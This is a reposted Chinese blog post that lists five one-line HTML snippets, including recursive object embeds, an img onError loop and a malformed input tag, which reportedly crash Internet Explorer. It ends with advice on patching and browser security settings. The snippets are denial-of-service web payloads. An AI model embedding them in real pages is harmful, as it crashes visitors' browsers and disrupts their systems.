一行代码崩溃IE(转)

一行代码崩溃IE(转)

    微软产品素以Bug众多著称,其中Windows系统和IE浏览器更是Bug多多。对于IE浏览器,甚至简单的一行代码就能使它崩溃。所谓IE崩溃,就是所有的IE浏览器窗口关闭,乃至引起系统出错、死机等。在网页中嵌入以下几种代码就能引起IE崩溃。

    1.object对象链接和嵌入元素循环调用能导致IE崩溃:

    <!-此代码所在的文件名应为crash.htm――><object data=″crash.htm″ type=″text/html″></object>

    2.包含恶意image标签的html页面能导致系统进程的无限循环,从而引起IE崩溃。对Windows9X操作系统,还会引起系统不稳定:

    <img src=″::″ onError=″this.src='::';″>对于这个Bug微软已经提供了补丁,如果你的系统打了这个补丁的话,你会看到一个弹出警告窗口:

    Stack overflow at line?x(在某行栈溢出)。

    3.包含恶意AVI Object的html页面能引起IE崩溃:

    <object classid=″clsid?00022613-0000-0000-C000-000000000046″></object>

    4.一个包含特殊object对象内容的html页面将导致DoS攻击,引起IE崩溃:

    <object data=″#″ type=″text/x-scriptlet″></object>

    5.畸形的input标签导致IE崩溃:

    <input type>

    上面罗列的只是一些简单的代码,但能让IE崩溃的恶意代码又何止这些,IE的漏洞也不仅仅是崩溃,严重的漏洞能让心怀恶意者对用户的电脑为所欲为。IE作为绝大多数网民使用的浏览器,加强它的安全性势在必然,如及时打补丁、安装杀毒软件(可查杀一些恶意代码)、不访问不可靠的网站、提高浏览器的安全级别(如禁用ActiveX、禁止脚本、阻止Cookie)等。

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/14102/viewspace-115005/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/14102/viewspace-115005/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值